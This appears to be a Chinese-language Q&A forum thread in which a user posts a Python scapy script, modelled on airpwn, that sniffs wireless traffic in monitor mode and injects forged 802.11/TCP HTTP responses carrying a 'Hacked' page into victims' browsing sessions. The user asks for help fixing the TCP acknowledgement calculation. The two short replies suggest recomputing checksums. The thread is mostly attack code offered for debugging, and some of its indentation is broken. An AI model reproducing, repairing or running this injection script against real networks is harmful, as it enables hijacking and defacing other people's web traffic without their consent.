首页 / 问题 / 正文

在无线局域网中使用scapy创建伪造HTTP响应

1 投票
2 回答
2705 浏览
提问于 2025-04-18 00:37

我用python-scapy创建了一个像airpwn的程序。现在,我可以监听网络并伪造802.11数据包,设置任何需要的值来进行欺骗,然后把它发送到受害者的机器上,但这并没有成功。我觉得可能是我在计算伪造的确认号(ack number)时出错了。请告诉我如何重新计算确认号,或者我遗漏了什么。

#!/usr/bin/env python

from scapy.all import *
from scapy.error import Scapy_Exception
import os
import HTTP
##### Start promicuous mode with airmon-ng start wlan0 11 (airmon-ng start/stop interface channel)
tmp=os.popen("iwconfig 2>&1 | grep ESSID | awk '{print $1}' | grep wlan | grep -v mon")
wlan=tmp.read()
wlan=wlan.rstrip('\n')
m_iface="mon0"
#spoof_response=rdpcap("response.cap")

def pktTCP(pkt):
    if pkt.haslayer(TCP):
        if HTTP.HTTPRequest or HTTP.HTTPResponse in pkt:
            src=pkt[IP].src
            srcport=pkt[IP].sport
            dst=pkt[IP].dst
            dstport=pkt[IP].dport
            test=pkt[TCP].payload
            if (HTTP.HTTPRequest in pkt):
                print "HTTP Request:"
                print "======================================================================"
                print ("Src: ",src," Sport: ",srcport," Dst: ",dst," Dport: ",dstport," Hostname: ",test.Host)
                print ("Seq: ",str(pkt[TCP].seq)," | Ack: ",str(pkt[TCP].ack))
                print ("Wireless: ",wlan)

                dot11_frame = RadioTap()/Dot11(
                    type = "Data",
                    FCfield = "from-DS",
                    addr1 = pkt[Dot11].addr2,
                    addr2 = pkt[Dot11].addr1,
                    addr3 = pkt[Dot11].addr1,
                    )

                #### Spoof HTTP Response
                                day=time.strftime("%a, %d %Y %T GMT+7")
                                #print day
                                spoof_Page="<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\"><html><head><title>Hacked</title></head><body><p>Hacked By Sumedt</font></p></body></html>"
                len_of_page=len(spoof_Page)
                spoof_HTTP_Response_Header="HTTP/1.1 200 OK\x0d\x0aDate: "+day+"\x0d\x0aContent-Type: text/html; charset=UTF-8\x0d\x0aContent-Length: "+str(len_of_page)+"\x0d\x0a\x0d\x0a"
                                Spoof_Payload=spoof_HTTP_Response_Header+spoof_Page


                #### Crafing HTTP Response Packet
                spoof_response=dot11_frame/LLC(ctrl=3)/SNAP()/IP()/TCP()/Spoof_Payload
                #### Spoof IP
                spoof_response.dst=pkt[IP].src
                spoof_response.src=pkt[IP].dst
                spoof_response.ttl=pkt[IP].ttl
                #### Spoof TCP
                spoof_response.sport=pkt[TCP].dport
                spoof_response.dport=pkt[TCP].sport
                spoof_response.window=dport=pkt[TCP].window
                spoof_response.seq=pkt[TCP].ack

                ### Recalculate chksum and ack              
                spoof_response.ack=(pkt[TCP].seq + len(Spoof_Payload)) & 0xffffffff
                del spoof_response.chksum
                ### For recalculate chksum
                spoof_response = spoof_response.__class__(str(spoof_response))

                print "Finish specific value"
                #spoof_response.show()
                sendp(spoof_response)

print "Start Sniffing"
sniff(iface=m_iface,prn=pktTCP)
网络监听 数据包伪造 scapy工具 无线局域网 确认号计算

2 个回答

0

在删除了 spoof_response.chksum 之后,我觉得你需要重新初始化这个变量。

就像这样:

spoof_response.chksum = spoof_response.__class__(str(spoof_response))
回答于 2025-04-18 由 Python大师
分享 举报
0

如果你修改了数据包里的内容,那么MAC头和TCP头里的校验和也得跟着改动。否则,系统会把这个数据包当成错误的包,自动丢掉。

回答于 2025-04-18 由 Python大师
分享 举报

撰写回答